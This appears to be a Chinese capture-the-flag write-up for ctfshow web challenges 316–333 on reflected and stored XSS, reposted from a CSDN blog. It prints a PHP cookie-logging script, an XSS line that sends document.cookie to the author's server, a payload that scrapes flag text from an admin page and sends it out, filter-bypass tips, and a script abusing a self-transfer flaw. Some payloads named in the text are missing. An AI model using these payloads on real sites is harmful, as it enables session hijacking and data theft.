WEB316

反射性 XSS

题目提示我们要以 admin 获取

奇葩的是用网上的 xss 平台，获取的 cookie 全是自己的。

可以在自己的服务器上，创建一个接收 cookie 的 PHP 文件：

PHP$cookie = $_GET['cookie'];$time = date('Y-m-d h:i:s', time());$log = fopen("cookie.txt", "a");fwrite($log,$time.':    '. $cookie . "\n");fclose($log);?>

构造 xss 语句：

<script>location.href="Http://ip/x.php?cookie="+document.cookie</script>

web317

过滤了 script，标签可以用 img 标签。

web318-319

img 标签也被过滤了，可以用 body 标签。

web320-326(反射型)

上面的 payload 用不了，测试一番发现过滤了空格，可以用 / 绕过。

web327(存储型xss)

收件人 admin，

web328

在用户管理处显示要 admin 权限，且显示会显示所有的用户名密码，说明它会存储在某个地方，那么这个存的用户名和密码处会不会产生 xss 呢？

答案是会产生 xss：
上面的那个 body 标签没用了，我们可以使用

更改phpsessid 访问用户管理的时候，会跳转，我们可以抓包查看。

web329

继续用上面的payload 获得了 admin 的 cookie，但是访问的时候却还显示不是 admin，并且 cookie 会变化，也就是说这个 cookie 在使用后就没用了。

看了 bilibili 里的视频后，学到一种姿势，因为它会把我们的 xss 代码即使是在用户管理里也会执行，所以我们可以这届把 flag 发送到我们的服务器里。

<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerText.indexOf('ctfshow{')>-1){location.href='http://ip/x.php?cookie='+value.innerText}});</script>

payload:

web330

有修改密码的地方，那我们不就可以直接修改 admin 的密码了吗。

路径也知道了。

payload：

最后登录抓包得到 flag

web331

和上一题不同的是，这次的是 post 请求，用 ajax 异步请求。

最后注册，登录 admin 拿到 flag。

web332

经测试自己转账给自己，余额不降反升，那么写个脚本跑一下呗。

import requestsurl = 'http://ef46a706-80af-4a5c-8168-42d0aa88b161.challenge.ctf.show/api/amount.php'money = 4for i in range(100):    data = {        'u':'111',        'a':money    }    money += 4    cookie = {        'PHPSESSID':'p8fk0f6lht46n8h5n96u5m7fjs'    }    req = requests.post(url,data=data,cookies=cookie)    print(req.text)

web333

同上

预期解释通过 ajax 异步提交 post 数据，让 admin 转账给我们。

具体步骤是，先注册一个收款人用户，再注册一个 xss 用户，之后等会，admin 就转完了。

来源地址：https://blog.csdn.net/shinygod/article/details/128007318